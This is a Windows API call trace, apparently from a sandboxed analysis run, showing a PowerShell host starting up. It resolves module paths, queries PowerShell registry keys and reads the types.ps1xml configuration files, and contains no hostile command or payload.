	[0391.407] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0391.940] CoTaskMemAlloc (cb=0x104) returned 0x34e580
	[0391.940] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x34e580, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0391.940] CoTaskMemFree (pv=0x34e580) 
	[0391.941] CoTaskMemAlloc (cb=0xcc) returned 0x35b900
	[0391.941] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x35b900, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0391.941] CoTaskMemFree (pv=0x35b900) 
	[0391.941] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x16da48 | out: phkResult=0x16da48*=0x1c4) returned 0x0
	[0391.942] RegQueryValueExW (in: hKey=0x1c4, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x16d9cc, lpData=0x0, lpcbData=0x16d9c8*=0x0 | out: lpType=0x16d9cc*=0x2, lpData=0x0, lpcbData=0x16d9c8*=0x6c) returned 0x0
	[0391.942] CoTaskMemAlloc (cb=0x70) returned 0x1b7c53b0
	[0391.942] RegQueryValueExW (in: hKey=0x1c4, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x16d99c, lpData=0x1b7c53b0, lpcbData=0x16d998*=0x6c | out: lpType=0x16d99c*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x16d998*=0x6c) returned 0x0
	[0391.942] CoTaskMemFree (pv=0x1b7c53b0) 
	[0391.942] CoTaskMemAlloc (cb=0xcc) returned 0x35b900
	[0391.942] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x35b900, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0391.942] CoTaskMemFree (pv=0x35b900) 
	[0391.942] CoTaskMemAlloc (cb=0xcc) returned 0x35b900
	[0391.942] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x35b900, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0391.942] CoTaskMemFree (pv=0x35b900) 
	[0391.946] RegCloseKey (hKey=0x1c4) returned 0x0
	[0391.946] CoTaskMemAlloc (cb=0xcc) returned 0x35b900
	[0391.946] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x35b900, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0391.946] CoTaskMemFree (pv=0x35b900) 
	[0391.946] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x16da48 | out: phkResult=0x16da48*=0x1c4) returned 0x0
	[0391.946] RegQueryValueExW (in: hKey=0x1c4, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x16d9cc, lpData=0x0, lpcbData=0x16d9c8*=0x0 | out: lpType=0x16d9cc*=0x0, lpData=0x0, lpcbData=0x16d9c8*=0x0) returned 0x2
	[0391.946] RegCloseKey (hKey=0x1c4) returned 0x0
	[0391.952] CoTaskMemAlloc (cb=0x20c) returned 0x349af0
	[0391.952] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x349af0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0391.953] CoTaskMemFree (pv=0x349af0) 
	[0391.953] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x16d5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0391.954] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
	[0391.964] CoTaskMemAlloc (cb=0x104) returned 0x34e580
	[0391.964] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e580, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0391.964] CoTaskMemFree (pv=0x34e580) 
	[0391.965] CoTaskMemAlloc (cb=0x104) returned 0x34e580
	[0391.965] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e580, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0391.965] CoTaskMemFree (pv=0x34e580) 
	[0391.968] CoTaskMemAlloc (cb=0x104) returned 0x34e580
	[0391.968] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e580, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0391.968] CoTaskMemFree (pv=0x34e580) 
	[0391.968] CoTaskMemAlloc (cb=0x104) returned 0x34e580
	[0391.968] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e580, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0391.968] CoTaskMemFree (pv=0x34e580) 
	[0391.970] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d838 | out: phkResult=0x16d838*=0x1c8) returned 0x0
	[0391.972] RegQueryValueExW (in: hKey=0x1c8, lpValueName="path", lpReserved=0x0, lpType=0x16d84c, lpData=0x0, lpcbData=0x16d848*=0x0 | out: lpType=0x16d84c*=0x1, lpData=0x0, lpcbData=0x16d848*=0x74) returned 0x0
	[0391.972] RegQueryValueExW (in: hKey=0x1c8, lpValueName="path", lpReserved=0x0, lpType=0x16d7bc, lpData=0x0, lpcbData=0x16d7b8*=0x0 | out: lpType=0x16d7bc*=0x1, lpData=0x0, lpcbData=0x16d7b8*=0x74) returned 0x0
	[0391.972] CoTaskMemAlloc (cb=0x78) returned 0x1b7c53b0
	[0391.972] RegQueryValueExW (in: hKey=0x1c8, lpValueName="path", lpReserved=0x0, lpType=0x16d78c, lpData=0x1b7c53b0, lpcbData=0x16d788*=0x74 | out: lpType=0x16d78c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x16d788*=0x74) returned 0x0
	[0391.972] CoTaskMemFree (pv=0x1b7c53b0) 
	[0391.972] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x16d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0391.973] SetErrorMode (uMode=0x1) returned 0x1
	[0391.973] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x16d710 | out: lpFileInformation=0x16d710*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0391.973] SetErrorMode (uMode=0x1) returned 0x1
	[0391.974] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0391.974] SetErrorMode (uMode=0x1) returned 0x1
	[0391.974] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d710 | out: lpFileInformation=0x16d710*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0391.974] SetErrorMode (uMode=0x1) returned 0x1
	[0391.976] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0391.976] SetErrorMode (uMode=0x1) returned 0x1
	[0391.976] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d710 | out: lpFileInformation=0x16d710*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0391.976] SetErrorMode (uMode=0x1) returned 0x1
	[0391.977] CoTaskMemAlloc (cb=0x104) returned 0x34e580
	[0391.977] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e580, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0391.977] CoTaskMemFree (pv=0x34e580) 
	[0391.978] CoTaskMemAlloc (cb=0x104) returned 0x34e580
	[0391.978] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e580, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0391.978] CoTaskMemFree (pv=0x34e580) 
	[0391.979] GetACP () returned 0x4e4
	[0392.503] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0392.503] SetErrorMode (uMode=0x1) returned 0x1
	[0392.504] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x31c
	[0392.505] GetFileType (hFile=0x31c) returned 0x1
	[0392.505] SetErrorMode (uMode=0x1) returned 0x1
	[0392.505] GetFileType (hFile=0x31c) returned 0x1
	[0392.507] ReadFile (in: hFile=0x31c, lpBuffer=0x2debde0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d648, lpOverlapped=0x0 | out: lpBuffer=0x2debde0*, lpNumberOfBytesRead=0x16d648*=0x1000, lpOverlapped=0x0) returned 1
	[0392.509] ReadFile (in: hFile=0x31c, lpBuffer=0x2debde0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d648, lpOverlapped=0x0 | out: lpBuffer=0x2debde0*, lpNumberOfBytesRead=0x16d648*=0x1000, lpOverlapped=0x0) returned 1
	[0392.510] ReadFile (in: hFile=0x31c, lpBuffer=0x2debde0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d648, lpOverlapped=0x0 | out: lpBuffer=0x2debde0*, lpNumberOfBytesRead=0x16d648*=0x1000, lpOverlapped=0x0) returned 1
	[0392.510] ReadFile (in: hFile=0x31c, lpBuffer=0x2debde0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d648, lpOverlapped=0x0 | out: lpBuffer=0x2debde0*, lpNumberOfBytesRead=0x16d648*=0xcf3, lpOverlapped=0x0) returned 1
	[0392.510] ReadFile (in: hFile=0x31c, lpBuffer=0x2deb23b, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x16d648, lpOverlapped=0x0 | out: lpBuffer=0x2deb23b*, lpNumberOfBytesRead=0x16d648*=0x0, lpOverlapped=0x0) returned 1
	[0392.510] ReadFile (in: hFile=0x31c, lpBuffer=0x2debde0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d648, lpOverlapped=0x0 | out: lpBuffer=0x2debde0*, lpNumberOfBytesRead=0x16d648*=0x0, lpOverlapped=0x0) returned 1
	[0392.513] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0392.513] SetErrorMode (uMode=0x1) returned 0x1
	[0392.513] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d5c0 | out: lpFileInformation=0x16d5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0392.513] SetErrorMode (uMode=0x1) returned 0x1
	[0392.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0392.514] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d6a8 | out: phkResult=0x16d6a8*=0x31c) returned 0x0
	[0392.515] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d62c, lpData=0x0, lpcbData=0x16d628*=0x0 | out: lpType=0x16d62c*=0x1, lpData=0x0, lpcbData=0x16d628*=0x56) returned 0x0
	[0392.515] CoTaskMemAlloc (cb=0x5a) returned 0x1b7c4740
	[0392.515] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d5fc, lpData=0x1b7c4740, lpcbData=0x16d5f8*=0x56 | out: lpType=0x16d5fc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d5f8*=0x56) returned 0x0
	[0392.515] CoTaskMemFree (pv=0x1b7c4740) 
	[0392.515] RegCloseKey (hKey=0x31c) returned 0x0
	[0392.515] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0392.515] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0393.049] GetSystemInfo (in: lpSystemInfo=0x16c2e0 | out: lpSystemInfo=0x16c2e0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0393.049] VirtualQuery (in: lpAddress=0x16c390, lpBuffer=0x16d250, dwLength=0x30 | out: lpBuffer=0x16d250*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0393.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0393.059] SetErrorMode (uMode=0x1) returned 0x1
	[0393.059] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1c8
	[0393.059] GetFileType (hFile=0x1c8) returned 0x1
	[0393.059] SetErrorMode (uMode=0x1) returned 0x1
	[0393.059] GetFileType (hFile=0x1c8) returned 0x1
	[0393.059] ReadFile (in: hFile=0x1c8, lpBuffer=0x2ce5fe0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d648, lpOverlapped=0x0 | out: lpBuffer=0x2ce5fe0*, lpNumberOfBytesRead=0x16d648*=0x1000, lpOverlapped=0x0) returned 1
	[0393.060] ReadFile (in: hFile=0x1c8, lpBuffer=0x2ce5fe0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d648, lpOverlapped=0x0 | out: lpBuffer=0x2ce5fe0*, lpNumberOfBytesRead=0x16d648*=0x1000, lpOverlapped=0x0) returned 1
	[0393.060] ReadFile (in: hFile=0x1c8, lpBuffer=0x2ce5fe0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d648, lpOverlapped=0x0 | out: lpBuffer=0x2ce5fe0*, lpNumberOfBytesRead=0x16d648*=0x1000, lpOverlapped=0x0) returned 1
	[0393.061] ReadFile (in: hFile=0x1c8, lpBuffer=0x2ce5fe0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d648, lpOverlapped=0x0 | out: lpBuffer=0x2ce5fe0*, lpNumberOfBytesRead=0x16d648*=0x1000, lpOverlapped=0x0) returned 1
	[0393.061] ReadFile (in: hFile=0x1c8, lpBuffer=0x2ce5fe0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d648, lpOverlapped=0x0 | out: lpBuffer=0x2ce5fe0*, lpNumberOfBytesRead=0x16d648*=0x1000, lpOverlapped=0x0) returned 1
	[0393.061] ReadFile (in: hFile=0x1c8, lpBuffer=0x2ce5fe0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d648, lpOverlapped=0x0 | out: lpBuffer=0x2ce5fe0*, lpNumberOfBytesRead=0x16d648*=0x1000, lpOverlapped=0x0) returned 1
	[0393.061] ReadFile (in: hFile=0x1c8, lpBuffer=0x2ce5fe0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d648, lpOverlapped=0x0 | out: lpBuffer=0x2ce5fe0*, lpNumberOfBytesRead=0x16d648*=0x1000, lpOverlapped=0x0) returned 1
	[0393.061] ReadFile (in: hFile=0x1c8, lpBuffer=0x2ce5fe0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d648, lpOverlapped=0x0 | out: lpBuffer=0x2ce5fe0*, lpNumberOfBytesRead=0x16d648*=0x1000, lpOverlapped=0x0) returned 1
	[0393.061] ReadFile (in: hFile=0x1c8, lpBuffer=0x2ce5fe0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d648, lpOverlapped=0x0 | out: lpBuffer=0x2ce5fe0*, lpNumberOfBytesRead=0x16d648*=0x1000, lpOverlapped=0x0) returned 1
	[0393.062] ReadFile (in: hFile=0x1c8, lpBuffer=0x2ce5fe0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d648, lpOverlapped=0x0 | out: lpBuffer=0x2ce5fe0*, lpNumberOfBytesRead=0x16d648*=0x1000, lpOverlapped=0x0) returned 1
	[0393.062] ReadFile (in: hFile=0x1c8, lpBuffer=0x2ce5fe0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d648, lpOverlapped=0x0 | out: lpBuffer=0x2ce5fe0*, lpNumberOfBytesRead=0x16d648*=0x1000, lpOverlapped=0x0) returned 1
	[0393.062] ReadFile (in: hFile=0x1c8, lpBuffer=0x2ce5fe0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d648, lpOverlapped=0x0 | out: lpBuffer=0x2ce5fe0*, lpNumberOfBytesRead=0x16d648*=0x1000, lpOverlapped=0x0) returned 1
	[0393.063] ReadFile (in: hFile=0x1c8, lpBuffer=0x2ce5fe0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d648, lpOverlapped=0x0 | out: lpBuffer=0x2ce5fe0*, lpNumberOfBytesRead=0x16d648*=0x1000, lpOverlapped=0x0) returned 1
	[0393.063] ReadFile (in: hFile=0x1c8, lpBuffer=0x2ce5fe0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d648, lpOverlapped=0x0 | out: lpBuffer=0x2ce5fe0*, lpNumberOfBytesRead=0x16d648*=0x1000, lpOverlapped=0x0) returned 1
	[0393.063] ReadFile (in: hFile=0x1c8, lpBuffer=0x2ce5fe0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d648, lpOverlapped=0x0 | out: lpBuffer=0x2ce5fe0*, lpNumberOfBytesRead=0x16d648*=0x1000, lpOverlapped=0x0) returned 1
	[0393.063] ReadFile (in: hFile=0x1c8, lpBuffer=0x2ce5fe0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d648, lpOverlapped=0x0 | out: lpBuffer=0x2ce5fe0*, lpNumberOfBytesRead=0x16d648*=0x1000, lpOverlapped=0x0) returned 1
	[0393.063] ReadFile (in: hFile=0x1c8, lpBuffer=0x2ce5fe0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d648, lpOverlapped=0x0 | out: lpBuffer=0x2ce5fe0*, lpNumberOfBytesRead=0x16d648*=0x1000, lpOverlapped=0x0) returned 1
	[0393.064] ReadFile (in: hFile=0x1c8, lpBuffer=0x2ce5fe0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d648, lpOverlapped=0x0 | out: lpBuffer=0x2ce5fe0*, lpNumberOfBytesRead=0x16d648*=0x1000, lpOverlapped=0x0) returned 1
	[0393.065] ReadFile (in: hFile=0x1c8, lpBuffer=0x2ce5fe0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d648, lpOverlapped=0x0 | out: lpBuffer=0x2ce5fe0*, lpNumberOfBytesRead=0x16d648*=0x1000, lpOverlapped=0x0) returned 1
	[0393.065] ReadFile (in: hFile=0x1c8, lpBuffer=0x2ce5fe0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d648, lpOverlapped=0x0 | out: lpBuffer=0x2ce5fe0*, lpNumberOfBytesRead=0x16d648*=0x1000, lpOverlapped=0x0) returned 1
	[0393.065] ReadFile (in: hFile=0x1c8, lpBuffer=0x2ce5fe0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d648, lpOverlapped=0x0 | out: lpBuffer=0x2ce5fe0*, lpNumberOfBytesRead=0x16d648*=0x1000, lpOverlapped=0x0) returned 1
	[0393.065] ReadFile (in: hFile=0x1c8, lpBuffer=0x2ce5fe0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d648, lpOverlapped=0x0 | out: lpBuffer=0x2ce5fe0*, lpNumberOfBytesRead=0x16d648*=0x1000, lpOverlapped=0x0) returned 1
	[0393.066] ReadFile (in: hFile=0x1c8, lpBuffer=0x2ce5fe0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d648, lpOverlapped=0x0 | out: lpBuffer=0x2ce5fe0*, lpNumberOfBytesRead=0x16d648*=0x1000, lpOverlapped=0x0) returned 1
	[0393.066] ReadFile (in: hFile=0x1c8, lpBuffer=0x2ce5fe0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d648, lpOverlapped=0x0 | out: lpBuffer=0x2ce5fe0*, lpNumberOfBytesRead=0x16d648*=0x1000, lpOverlapped=0x0) returned 1
	[0393.066] ReadFile (in: hFile=0x1c8, lpBuffer=0x2ce5fe0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d648, lpOverlapped=0x0 | out: lpBuffer=0x2ce5fe0*, lpNumberOfBytesRead=0x16d648*=0x1000, lpOverlapped=0x0) returned 1
	[0393.066] ReadFile (in: hFile=0x1c8, lpBuffer=0x2ce5fe0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d648, lpOverlapped=0x0 | out: lpBuffer=0x2ce5fe0*, lpNumberOfBytesRead=0x16d648*=0x1000, lpOverlapped=0x0) returned 1
	[0393.067] ReadFile (in: hFile=0x1c8, lpBuffer=0x2ce5fe0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d648, lpOverlapped=0x0 | out: lpBuffer=0x2ce5fe0*, lpNumberOfBytesRead=0x16d648*=0x1000, lpOverlapped=0x0) returned 1
	[0393.067] ReadFile (in: hFile=0x1c8, lpBuffer=0x2ce5fe0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d648, lpOverlapped=0x0 | out: lpBuffer=0x2ce5fe0*, lpNumberOfBytesRead=0x16d648*=0x1000, lpOverlapped=0x0) returned 1
	[0393.067] ReadFile (in: hFile=0x1c8, lpBuffer=0x2ce5fe0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d648, lpOverlapped=0x0 | out: lpBuffer=0x2ce5fe0*, lpNumberOfBytesRead=0x16d648*=0x1000, lpOverlapped=0x0) returned 1
	[0393.067] ReadFile (in: hFile=0x1c8, lpBuffer=0x2ce5fe0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d648, lpOverlapped=0x0 | out: lpBuffer=0x2ce5fe0*, lpNumberOfBytesRead=0x16d648*=0x1000, lpOverlapped=0x0) returned 1
	[0393.067] ReadFile (in: hFile=0x1c8, lpBuffer=0x2ce5fe0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d648, lpOverlapped=0x0 | out: lpBuffer=0x2ce5fe0*, lpNumberOfBytesRead=0x16d648*=0x1000, lpOverlapped=0x0) returned 1
	[0393.067] ReadFile (in: hFile=0x1c8, lpBuffer=0x2ce5fe0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d648, lpOverlapped=0x0 | out: lpBuffer=0x2ce5fe0*, lpNumberOfBytesRead=0x16d648*=0x1000, lpOverlapped=0x0) returned 1
	[0393.068] ReadFile (in: hFile=0x1c8, lpBuffer=0x2ce5fe0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d648, lpOverlapped=0x0 | out: lpBuffer=0x2ce5fe0*, lpNumberOfBytesRead=0x16d648*=0x1000, lpOverlapped=0x0) returned 1
	[0393.069] ReadFile (in: hFile=0x1c8, lpBuffer=0x2ce5fe0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d648, lpOverlapped=0x0 | out: lpBuffer=0x2ce5fe0*, lpNumberOfBytesRead=0x16d648*=0x1000, lpOverlapped=0x0) returned 1
